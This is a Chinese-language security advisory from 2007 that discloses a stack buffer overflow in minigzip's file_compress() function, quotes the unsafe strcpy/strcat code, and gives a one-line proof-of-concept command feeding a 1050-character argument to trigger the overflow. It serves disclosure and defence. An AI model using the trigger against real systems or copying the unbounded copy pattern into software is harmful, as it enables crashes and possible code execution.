发布日期：2007-03-14
更新日期：2007-03-16

受影响系统：

Jean-loup Gailly minigzip

描述：

---

BUGTRAQ  ID: 22964

minigzip是用于实现gzip的压缩工具包。

minigzip的void file_compress(file, mode)调用没有安全的使用strcpy()：

#define MAX_NAME_LEN 1024
[..]
void file_compress(file, mode)
    char  *file;
      char  *mode;
{
    local char outfile[MAX_NAME_LEN];
    FILE  *in;
    gzFile out;

      strcpy(outfile, file);
    strcat(outfile, GZ_SUFFIX);

main()函数调用了file_compress()，这可能触发缓冲区溢出，导致执行任意代码。

<*来源：starcadi （starcadi@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=117399754705658&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ minigzip `perl -e "print 'A'x1050"`

建议：

---

厂商补丁：

Jean-loup Gailly
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://gailly.net/

浏览次数：2651
严重程度：0（网友投票）